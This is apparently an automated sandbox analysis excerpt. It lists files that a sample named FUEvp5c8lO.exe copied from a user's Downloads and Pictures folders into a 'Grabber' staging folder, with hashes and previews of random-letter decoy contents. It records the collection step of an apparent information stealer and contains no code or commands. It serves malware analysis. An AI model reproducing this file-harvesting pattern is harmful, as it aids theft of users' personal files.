Malicious:	false
Preview:	QVTVNIBKSDCTAQBGAOXCDNDJJSYXWJGWLNQZGTIRDPOXBJKWLQKQGHTGEEYZCSQXRIHLQYWVXDHEUMWEKWFGJLMYICQYBHNEZJWDJOGRRNRTOYBVHVOADCWLJBCJDEJQGWHIISDSHGZRWITARTFGZLYVQWZDXCBALJESXBFEMTGTIZQWIKXFTDQGTAMDONWUIJUYOKJXLUTMOCIHGFKUVWTZWGGDCWXLKJNCFYDCGKWQMLFWZQSHHWIEETWTGXVBHMSPQQUETSKWPAJFMRFRCHDNYKBAAHPLMJRBBAJTVLLAUUCLJYJMJLBKQGNTWGMPYQTUPYRFGMYPSFAZKFDAZPZSDSLLFCSCKJNYWUFBZSQQHSKWDGIBILREFDZJQVIODCTVEDOBTVFRFOHJOUFGKJWSBYWFYBYTUGQGTLYPZCUIXPOJLCNPDOVBXWCGCWSAJJFYOSWSVKPATDKQJRADERJVQVTQESFPSXRVBVEDLVTQYWXVFAKVPURCBYBIAPAQUFQNNEYDRUYBOOCMWAVFRHNFPGDIUCRWCXKMXPIRSBECJROTFLGGLOLFKFRGHTSAIKSQPSZXJDXWBHZHVBFILAACTJHJEQBYDONPYTGLNXEZPFCIDHTTHGIOFCTFHRHIJGRCZPVJAOXIBAJIEMVNELYPQKBHQECWJYTAPCZMZNVFUTOKDAKOXRQKSDSHHXCNPTOQACAKMZSIGEKSTZYQWWAIYNMYZGDCJITHDWZHQWHGDAHXUUSQNHSEWLINMAVJEJLBWIZQNZHARGRNBGZEQKQKZKRPFIWNXAVGMLKQJEJDYBDRSHJBULSDTLIKLIFONGYGERWNAHSKLLHMDBCSSWVOEIGUACWQMNZYBQMRIYIQZQOYRZUOCZWOMBFRIJMVRKAWJHTMEMGVQYWBBMYZGCFTJKRLDPFOIYFDWQUEGJXKLKIPLVLNTFZCDKJMEKYNPPGPMXAGDHXGEVWCGIHPFBAPAKCGGKURXQFPUIQV

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\TQDGENUHWP.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696312162983912
Encrypted:	false
SSDEEP:	24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:	83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:	0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:	8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:	F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:	false
Preview:	TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\TQDGENUHWP.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696312162983912
Encrypted:	false
SSDEEP:	24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:	83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:	0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:	8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:	F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:	false
Preview:	TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\VLZDGUKUTZ.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\XZXHAVGRAG.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ZSSZYEFYMU.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698801429970146
Encrypted:	false
SSDEEP:	24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
MD5:	488BC4EF686937916ECE6285266A6075
SHA1:	498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
SHA-256:	8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
SHA-512:	1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
Malicious:	false
Preview:	ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ZSSZYEFYMU.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698801429970146
Encrypted:	false
SSDEEP:	24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
MD5:	488BC4EF686937916ECE6285266A6075
SHA1:	498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
SHA-256:	8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
SHA-512:	1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
Malicious:	false
Preview:	ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.5191090305155277
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
MD5:	3A37312509712D4E12D27240137FF377
SHA1:	30CED927E23B584725CF16351394175A6D2A9577
SHA-256:	B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
SHA-512:	DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\System\Process.txt

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	19774
Entropy (8bit):	5.697755017670277
Encrypted:	false
SSDEEP:	96:oHaHoHfHqHGHRHS9HNHgH+VHnHzHgHKHeHkEH2H9Huq8HsHOHkTHfHTHGHSH+AVi:ZCqtKXeGODgnK9N4ZEHRotnpnn82
MD5:	68B73125879016B24DE72ED7FE8D013D
SHA1:	320DA8737DB0F56ED89D79442065F15C2B637AFC
SHA-256:	4D20E9CFD2654F3C1CDE553DC2839FC784EEBA39B2A4E8242CC06A481F15981D
SHA-512:	8014A27748287DE7EA41969DA5501A2BE25B76CE3B642A46823376567FE48EF446CED2F2BEAE3D99DC9F9DAAF5804AA90AF2BC64A3832E009FF5753E10E6438E
Malicious:	false
